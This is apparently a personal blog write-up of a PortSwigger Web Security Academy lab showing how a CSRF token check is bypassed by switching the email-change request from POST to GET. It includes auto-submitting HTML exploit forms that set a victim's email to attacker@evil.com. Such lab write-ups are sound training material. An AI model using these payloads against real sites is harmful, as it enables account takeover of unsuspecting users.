Siunam's Website

My personal website

Home About Blog Writeups Projects E-Portfolio

CSRF where token validation depends on request method | Dec 15, 2022

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: CSRF where token validation depends on request method! Without further ado, let’s dive in.

Background

This lab’s email change functionality is vulnerable to CSRF. It attempts to block CSRF attacks, but only applies defenses to certain types of requests.

To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address.

You can log in to your own account using the following credentials: wiener:peter

Exploitation

Home page:

Login as user wiener:

In the previous lab, we found that the email change functionality is vulnerable to CSRF.

Now we can inspect the form:

<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
    <label>Email</label>
    <input required type="email" name="email" value="">
    <input required type="hidden" name="csrf" value="JMWikHWXdcNk0gmDyxXOhayb1J17hGXw">
    <button class='button' type='submit'> Update email </button>
</form>

This time, the form also has a hidden CSRF token!

Now, we can use the exploit server to deliver the exploit to the victim:

Let’s try to craft a form that performs CSRF attack!

<html>
	<head>
		<title>CSRF-2</title>
	</head>
	<body>
		<form action="https://0ac8002903f73b0cc0c8c73c00e50044.web-security-academy.net/my-account/change-email" method="POST">
		    <input type="hidden" name="email" value="attacker@evil.com">
		</form>

		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>

Now, we can click the View exploit to test the exploit locally:

However, we can’t modify our email address, as the form is missing the CSRF token!

To bypass the CSRF token, we can try to change our method from POST to GET:

<html>
	<head>
		<title>CSRF-2</title>
	</head>
	<body>
		<form action="https://0ac8002903f73b0cc0c8c73c00e50044.web-security-academy.net/my-account/change-email" method="GET">
		    <input type="hidden" name="email" value="attacker@evil.com">
		</form>

		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>

We’ve successfully changed our email address to attacker’s controlled value!

Next, to change other users’ email, we can click the Deliver exploit to victim button:

We did it!

What we’ve learned:

  1. CSRF where token validation depends on request method